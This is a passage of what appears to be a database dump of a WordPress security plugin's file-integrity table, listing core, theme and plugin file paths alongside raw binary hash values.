vi�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-select2-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NT����}m\rV�m�','>�q{(�+fޙ`�=��a@��3bzܥа�l','',0,'?'),('=�8�m�dp�`��\n:z','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-toggle-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bz.�?4i�B����','G�M\"R��W.`�x������֎.�Q�\\��i�K','',0,'?'),('=��k�[4��� ��=�','wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��|?�M��=]J��','�4x��������!Gk˙���Lto�!��\'�#','',0,'?'),('=��r�X!�>:\\�z��','wp-content/themes/newsmag/assets/sass/site/primary/_comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V^Mj�Iе�\n3ݡ�','��Y� w#�ГDg#~���J��-��qcy�i','',0,'?'),('=�41�b����J\"a','wp-content/themes/metro-magazine/template-parts/content-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+����\"M�(�ν�','�%�y;>jy\rg�(�=o�`u}����/@�du x','',0,'?'),('=��Ө��\0E���','wp-includes/blocks/verse/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�h>��K3���u1','��ߋ�!�;n�^�u|ا�$Y0�56��4�','',0,'?'),('=�;�{���e�6�5�','wp-includes/js/jquery/ui/effect-pulsate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('=�F�혣�Æ��K&�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�:7���]6hVo��','߫��/Lk����OT�bdS�EiL9���~8','',0,'?'),('=噄\nA�K(���l','wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@J��x&H�*8�����.','2�j��!^g^i�r3�P~�\0�K8�c��\n�','',0,'?'),('=�a׊ ��dӟr���','wp-content/themes/wp-simple/assets/images/preview/750x500-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��saO�-�iք��;','f\"cQ�ܹ���ّ��n;��e>��� ��','',0,'?'),('=�™�?,R���kN','wp-content/themes/enigma/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!J��E|v��W\'B�','C��PaS�ے��!��1����s��]o��� �&t','',0,'?'),('=�a������0&','wp-includes/js/jquery/ui/effect-slide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('=��cT�6s���AM�I','wp-content/themes/simpleshift/parts/header-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������6��3=��','P���萿UsZ����d񲻟6\"J�,���','',0,'?'),('=��~/\Z��a:ӟ�>','wp-content/themes/exoplanet/page-cta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��9��T��(���','�zf|��֙f��&��A�ӟ��s0�V#�','',0,'?'),('>�L�)=�J9ҳ','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i঺��ßOr�Q��','6a���Jޘ�ݾ�mm�?�/�e�{�ӆ\0�\r','',0,'?'),('>��G0�+m��X��x','wp-content/themes/catch-flames/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�W��rKy�','\"��C�u;a�PF����V�m	��3<�-�b�','',0,'?'),('>.�s��Kd�3�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/gss_test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o٫�n�+)�!��&�','̟�\'/G���d06�a�O)��ٹ�Y�z5{�','',0,'?'),('>5��ˏ.y2Q[ڣ�1�','wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i8��X�3����cTD','�J���$_�F�$o�����{�fC�~L�3��<','',0,'?'),('>G��O�jP�l���B','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�����\'Ρ0�g2','ؚx\"�o�*I�\nQ��j�����T(�G\Z�.�\Z','',0,'?'),('>H6��u���ۧO7؈','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/xq-dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PH9d.\'l3W���V�,','8�D&�:�V/���jc2CS�Hw]�ABXD�','',0,'?'),('>W6\n�l˦�F��q*�C','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$��9�L��8','�쮀ܻ�3OqJ\0��i<���i<��I��','',0,'?'),('>^��g��/��9�v)','wp-content/themes/authorize/components/features/featured-content/content-featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��D\\�9W��','����>ȒI��7�$D�V}�ެ$&�ؼq�','',0,'?'),('>d�RLډDh�uJH���','wp-content/plugins/wp-cerber/assets/bn5ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڑ����@�/�@�','\0�o �~�}�2�,_*Í {J�O�4SfY��','',0,'?'),('>hЩ�XX*�v1���','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('>q_�<&�0,��.�','wp-content/themes/university-hub/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<W�R���!�','V�R�y���n[{�F�K�<���d�F7�','',0,'?'),('>ql�+�m�\05Ħ\"�^','wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('>v]�{rq�6x�','wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��JkԌ`�M\"�r',';Ը�P��I��@?56�t���k�N�8@�=�4','',0,'?'),('>~��c��vN�M��%�','wp-content/themes/newsmag/assets/sass/navigation/_top-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.䠜C��Y\'�6���','$N	�b�\Z��h3�\"[P�U��!tBO�-B� ��C','',0,'?'),('>�(�1Bd�w2M�9','wp-content/themes/event/js/source/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�`\ZV\\����ti�h�','R\0H�:�� 0#8�.�U�C,!�xR��ꅞ','',0,'?'),('>����|�	�C)�����','wp-content/themes/graphene/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�)���H�8���eX','��,�wO��g�_X;t�k�NX�yk!���','',0,'?'),('>�S֬o~�X,���M','wp-content/themes/wp-simple/inc/kirki/assets/js/branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�迾��IBꪼg','�\06z=�a����\\��(���GmTꥪ7SQ','',0,'?'),('>��X�\r�b��ڟ�$W','wp-includes/class-wp-image-editor-gd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�RŖ���z`�T��','�	U� 5�BOu��>F���p_��}�d�.��','',0,'?'),('>��y��i��\\�','wp-content/themes/metro-magazine/images/video-play-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۦ�k�s��{7�','L�w.�7��G0�^���?}mG?���\r�','',0,'?'),('>�\nq��g�/����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�X�y����gr\"3g','a�55�\Z�\\���7w{Լ^d�����TK�','',0,'?'),('>�[��_fw7���','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/dashicons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r/\Z�5��S������','�G��\"�]icsҺ���҂�ڒ�(���','',0,'?'),('>�M~��;Oo��-�I$0','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f!��<�\r����yS�','\"-d���NN6�3�P`��ʜ`!��ڬ	�q�','',0,'?'),('>�?����c��֬�','wp-content/themes/metro-magazine/inc/customizer/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�)sQ�xZ���Z-o','�Y��Df����b@�#��-�N�C\r�o�	\n��','',0,'?'),('>��r�\'��yr39�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/htmlembedded/htmlembedded.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�E�8y�{���^��','��Q/:�(r{u���\0��kwVn��dT��PJX','',0,'?'),('?�ke�zC��\"!�@�','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('?\"d�_��쑽uA]','wp-content/themes/event/assets/sticky/sticky-settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�z��()g��ĵ��(','�Ѷ;]!�(��2S�)�^��9�5w�q&_l��','',0,'?'),('?%�IŠ�\'H-Vtu�','wp-content/themes/simpleshift/inc/kirki/assets/xml/colourlovers-top.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�L2Y�XO������','h�xU�.;�0\0���3��X;t�_v垐��I�&�','',0,'?'),('?\'�T�kd`�/�E��J','wp-content/themes/simpleshift/assets/js/jquery.waypoints.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��D{_^ݵ�O~�j','���bQg�%+}/d�����3C�{��{�S�qr','',0,'?'),('?0Y����%2�\r�Q�','wp-content/themes/the-best/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�ld*�Z�����b�','(�5�\\&HFI7l24=}`�j�V����Bj4)�','',0,'?'),('?2yT!s|��t��u}','wp-includes/random_compat/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�����\ZHr�','\nDfdvP�f�On:����a��г‘���X�','',0,'?'),('??Q$�P���.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0@�I�SB','�1����đ���,�h�-��h�>fھ�G]','',0,'?'),('?K�p[����nb���','wp-content/themes/catch-flames/images/search-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P`�_\0$\Z6�[`^�M','���(:�Z����v\n�h��R�f�)(��{','',0,'?'),('?N��.�͘�L��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/html-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k9�n�G;����I_�E','�ŭ�˿b�-���l#�����C	\Z��M','',0,'?'),('?U������\'_l.�p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B��	����IN�-y','��hl�[�������(�l~�Q�u�FM�	�','',0,'?'),('?Yv�q_����ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�B�Qx�SV.D','����6��\"@X�g\'�W7��w��gJ���q','',0,'?'),('?Z>Z��E��S�ƨIJ','wp-content/themes/weblog/acmethemes/customizer/header-options/header-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�V�%�MKqt�e','�~3(m�˪�\'埍��(�`HR��Ǚˍ�KQ','',0,'?'),('?]�P�.��1����2b','wp-includes/js/tinymce/plugins/textcolor/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('?_��,t3�JP�Ͻ�','wp-content/themes/quicksand/js/color-scheme-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�\\��ŁS���G�','�c���m�����A��$�����`��m��','',0,'?'),('?o�\\*�$m&]��}5\n�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2f @��\rs�؁R','@��GI��;�X!ë\Z]Zϯ����)e�Fg��','',0,'?'),('?���Z���8.���G','wp-content/plugins/wp-cerber/assets/flags/ec.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�׏* �k&�(ʬjJ�','Bd=�Zj?r/{��\Z���7MF��\'��n-Zi��','',0,'?'),('?���	W�g��1<A','wp-content/themes/brickyard/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�B\'$��NN|_�\0','Fth`��D풄hM�>=�}�3/�L��>rc','',0,'?'),('?�����ޖK��d�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��^e���)\n8Vx�','uఓ2*)��5���;8������[�·&�6�L','',0,'?'),('?�Fy��ˋ�:Z��m','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-generic-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Q`�A�|�%9\0�x+U','�=��%A|�c��V&���~��gX(�dn��\03Y','',0,'?'),('?��>�Kw�-�@<��','wp-content/themes/gambit/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Pv�%�HGi+hC�l','q�bDS�\0���\0f��΁O�^`����Jm,�','',0,'?'),('?�ę�����QbH�(H','wp-content/themes/graphene/loop-not-found.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�*e(�\r]tG۾�3p','o�ŒO@P\\����ɷ�Z�f��ה�(_�>','',0,'?'),('?�$0�ݘ��G���_�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/radio-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B_-\rs��NJ+��','�	�2C�Zf��{N�\0~�{hR_ ~~�1���>U','',0,'?'),('?��=�@�M�$#��P7','wp-includes/js/dist/html-entities.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�l��m7��#��F','�z�d��q�ٻ�ٿ���	l���w�5�M�','',0,'?'),('?���C����!��Ӳ','wp-content/themes/twentynineteen/sass/modules/_accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��*+��O}��g�','�/����h�f=@�0��5��H�0\r7t��m�8','',0,'?'),('?�q�M�� K,;}','wp-content/themes/chronus/template-parts/widgets/magazine-large-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŝƇ��-�kM���','b#¾�ЮYr=	�5�8���cd�y����2�','',0,'?'),('?�A���=���4]>�','wp-content/themes/advance/inc/kirki/assets/js/functions/validate-css-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y<�ǣ�)����>','�}� E��gv<�3HI.Qaq�������zU','',0,'?'),('?�cF	m��wI_��','wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*=i���ɱ����HR','����sk���Tˎč��u�|��Ќ���','',0,'?'),('?��K��,�62�B�@','wp-content/themes/lovecraft/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w�~�}Y�.�','�\nQ�1���c� ��)��{�����3�J��','',0,'?'),('@�K\r;�	z`N8����','wp-content/themes/enigma/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�ʔ_{s�GwEZ\\�','(!�x��ƨ�b�[Jhd�4�	��kFaC�eu�','',0,'?'),('@!�a�ie�\\1}ݱ�z','wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3s{_ƕ]��p�','���o;~]�b�^�R�<�l$�ә��1�6','',0,'?'),('@)�u��X�tȤ�0�','wp-content/plugins/wp-cerber/assets/flags/ng.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�mBC@�͚���','���H�!R�Ɂ=[�?aq�μYو�_hw��','',0,'?'),('@1S9���r#쐀��','wp-content/themes/catch-flames/images/demo/slider-1-1600x650.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&0��\r�A��q��K#�','g�����&A�:ٿ��ZL�x���=Ŋ<<�\Z','',0,'?'),('@?`�\r�\'n�B�@\\�','wp-content/themes/hitmag/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#3{�DK�:���-�','�y[�iN\0�QW���p�bO�:���逃�','',0,'?'),('@DD=����CDEͥ','wp-content/themes/edge/inc/customizer/functions/register-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9liv���y�XI�','�^�C��=:=�J�yp��� U�g��1{','',0,'?'),('@E!e��|��M��>/�','wp-content/themes/brickyard/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���� �{�l�\Z','�y-�����\0ZѬ���tmcҳ�7m �','',0,'?'),('@G )�7x=��A��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"����i�qo��h	?�','ڴaWtĉ����q�)N��*x�*���q;T��0','',0,'?'),('@L<��m�^��c��Ic','wp-content/plugins/wp-cerber/assets/flags/bb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0��(�zc�q','7!Ky�=�]b\neO-3{/Q��ȳ�Rҳ��L','',0,'?'),('@V�$�K���<�1*�','wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('@^��%����ͥw�}','wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�D�~����4�:','Z�y�P�X7�wg6Rz��4�^�l���O','',0,'?'),('@j�[ϳ�L����3��','wp-content/themes/chronus/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�!8F\Z\Z\'t�e�dd','U:�\"�8�^n���^^j\Z�O��>�i*!#��','',0,'?'),('@k/�����I�?T,','wp-includes/js/jquery/ui/datepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4}�aX2nH��GWx�{','/4XAJ\Z����o>V��ꔆ�I����','',0,'?'),('@��̘9�#�L�y(��','wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('@�3\\�~5C{7���T','wp-content/themes/brickyard/functions/about/images/active_hover.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fmg�A�����K]8�.','����׶��4�Leo6j+��I�y��Q�P�','',0,'?'),('@��L���:���(���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��\0�6�&�	�','uj���v��d_���=\n�2fY+��V\\��','',0,'?'),('@��칞ha.k�\'�c�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/kirki-toolkit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l)����.���5��@','�������th}�9r��N�f��s+k����8','',0,'?'),('@�֓m_�T���&=','wp-content/themes/education-hub/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�S���\\��ls�R','K��`�׊S7�=܆���oYީ����z�U	','',0,'?'),('@�*�-S]P��p�','wp-content/themes/event/assets/font-awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���v넚E�ǐ�;��','�&�zB]<���\"d�5z�y�;{�-6<�C	','',0,'?'),('@��\Z!z��r���W��p','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.Գ� <`�ϒ&�','V5��;����S6��,�Uft��Yn`A','',0,'?'),('@�XD\n�\nRN��t���','wp-admin/images/menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�9#�d�Y`	���','�l��IE/(�p��\0�pn�T-O�z\"],=`�','',0,'?'),('@�ȯ��&O�o���','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e�b\0��PO�����','_�u���j������P��-KOA�ܫ�����','',0,'?'),('@�O�\ZmZ�w��\ri','wp-content/themes/advance/inc/images/tick.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 뿬6Pfg��I','�t�u��;$ğ.yL����\"^5�U��dE��W','',0,'?'),('@�j�M\'Sf�O��{�@{','wp-content/themes/newsmag/assets/vendors/owl-carousel/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('@��]Q\n�j��}��','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/checkbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��I���n���kz�','_��\'`���tQ?_��`N�\0C���p�X��','',0,'?'),('@�L��߯7�٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R١��.�1&;�@','Y>]��B�A���u��5u�6�jT�6��d\rr+','',0,'?'),('@�$�?�\\�*����','wp-content/themes/edge/inc/js/customizer-custom-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:����\'��dL7w�','W?������3q��,V��?p�*�M�o','',0,'?'),('@�;5�X��V��O�Z','wp-admin/images/mask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g~�\"��J��䩎�','��/<s�ԡ�)�\'�.�1��jkn�K9Q���','',0,'?'),('@�7#��1��\r�h1��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/bin/authors.sh',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W0Bw�֖ހ��q{��l','�ࠜf&��n�����E �ɥ�VѾm��.��','',0,'?'),('@�OhF�:o�=�а��','wp-content/themes/catch-flames/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�����@�Lw','�\n���^�/�^�T�x�?�)_N�~Or6�\"x�j','',0,'?'),('@�m����O��W','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�����Lv��','v�����tQ�+4&f�d�1��Z�6LI�=�','',0,'?'),('@�t�R>G�Hh��ס','wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�=���a�-�II','7G�V����ԉͦE<����x�Z)��:�%','',0,'?'),('@��]��t��*L�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/neo.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��]�T��9���','z��Q��Y7Y3)ԻQ���v�G��\r�O{H��','',0,'?'),('@�o����t[�g�E�','wp-content/themes/Yegor/FT/options/banners.php',0,'_�}ӆ`��\\�K	','_�}ӆ`��\\�K	','�ʺ\r[E�J����CE].Ț\r�{�J=8\"�hL�','',0,'?'),('@�s�Z��^����q�v','wp-admin/images/media-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�WI��\\��?��','�<�:��tn�kb�wi�&��	��R����\Z','',0,'?'),('@��+�T΄\'����٤','wp-includes/ID3/module.audio.flac.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('A�lA~i^����u�Ø','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(RroΡC\r�\n�F�+�','��ﴖ�ș*���t�Q��zWÆ�ײU','',0,'?'),('A�R����a��v�w','wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�3\Z?Ȟ�~��c��','��E%�̈́K#z�L�ϋ�hǖ�ݪ	ף','',0,'?'),('A�Y���\rȾ\r�;M��','wp-content/themes/wp-simple/inc/pro/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۗ������ ��5','�P=�֦�^��d�,���G�t���j�^1��','',0,'?'),('A�>�v�Ɩ��.�0C','wp-content/themes/hitmag/inc/kirki/assets/js/controls/repeater.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ķ��\ZqCე+R��','��l��b����v�����mU�?UE(YfD�� t','',0,'?'),('AE���[�`����','wp-includes/js/thickbox/thickbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|}�\Zc�%��9j��','��b?/a#�׼�h�l��������\rk���','',0,'?'),('A\'\'`6l�(\r�T(���','wp-content/themes/brickyard/js/placeholders.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�c��P+v�Z!+�e�g','�]O)������ nj��^�����͵�r','',0,'?'),('A/hͳ$BQ��:����','wp-content/themes/twentynineteen/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HP~�,Y��`sMu�k�0','��;�`� ��:�6�P��q�L�:*;��','',0,'?'),('A1�Ǹh���Ep�4��','wp-content/themes/graphene/images/headers/nebula-thumb.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�b\0p��7=�3H�*�','���G�\"T���LXq[X\r����,jU��','',0,'?'),('A;�ت\Z���ܦ�z�','wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('AC�xjGa�����D{','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�LZ���&��4��','����A !k�p(�֞Y��m�^äzTe_����','',0,'?'),('AD5uY5�0Ul�:I)i�','wp-content/themes/quicksand/sidebar-content-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�@ȓ�n�i-$\0h','\rc��\n��C����q��w!��FŢ8�/��','',0,'?'),('AK<���j���gsr�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��Kb(�\\��p�B-','�ճ* ʰ	���[q��˜P���k�','',0,'?'),('AT�yxhl|�4+��n�','wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4 vHhg�BL','됤oϙ�,/����ɞq�?����s��CvF�','',0,'?'),('Aa�@J������Ł�','wp-includes/js/tinymce/plugins/colorpicker/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C��ȭ?d�{׭V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('As�v���g�4U�','wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�r�[Ķ��i��k�','����=cA\"�-3�8��{t-�8 ��h�','',0,'?'),('A{&� ��V>��Νs','wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N -?�6�>��9�A͘','!�;#Q%BX\"GҵWM��>���a���T��37D','',0,'?'),('A~�=�J�H!C�[^l�','wp-content/themes/weblog/assets/library/respond/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�\n��&���r','#%6�Y;C���\Z�����ER�ijO�F?�}�<','',0,'?'),('A��(��+v�I�m','wp-content/themes/education-hub/inc/helper/custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���D�C�LR��7�','-�F���ϵlmX	